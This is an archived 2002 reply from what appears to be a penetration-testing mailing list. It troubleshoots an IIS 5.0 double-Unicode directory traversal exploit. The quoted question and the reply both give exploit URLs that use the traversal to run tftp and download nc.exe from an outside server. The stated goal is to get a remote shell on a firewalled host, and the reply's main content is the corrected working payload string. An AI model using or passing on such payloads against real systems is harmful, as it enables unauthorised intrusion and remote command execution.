RE: Can't get a shell

From: Coral J. Cook (cjcookat_private)
Date: Thu Jul 11 2002 - 11:54:12 PDT

Next message: Glenn Larsson: "Re: Default passwords for TSO and CICS ?"

Previous message: Bill Pennington: "Re: escalating IUSR to admin rights via unicode and iis4"
In reply to: Gaziel, Avishay: "Can't get a shell"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> -----Original Message-----
> From: Gaziel, Avishay [mailto:agazielat_private]
> Sent: Tuesday, July 09, 2002 9:33 AM
> To: PEN-TESTat_private
> Subject: Can't get a shell
>
>
> Hi All,
> Situation:
> An  IIS5.0 vulnerable to unicode.("double Unicode" i.e. ..%255c.. etc.)
> IIS sitting behind a firewall.
> Problem:
> host/scripts/..%255c.........../winnt/system32/cmd.exe?/tftp+-i+my
> server+get+nc.exe doesn't work

Here is the correct format:

host/scripts/..%255c.........../winnt/system32/tftp?+"-i"+myserver+GET+nc.ex
e

notice that cmd.exe is removed and that -i is quoted "-i"
that should fix your problem

R,
Coral



----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: Glenn Larsson: "Re: Default passwords for TSO and CICS ?"
Previous message: Bill Pennington: "Re: escalating IUSR to admin rights via unicode and iis4"
In reply to: Gaziel, Avishay: "Can't get a shell"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jul 11 2002 - 18:48:24 PDT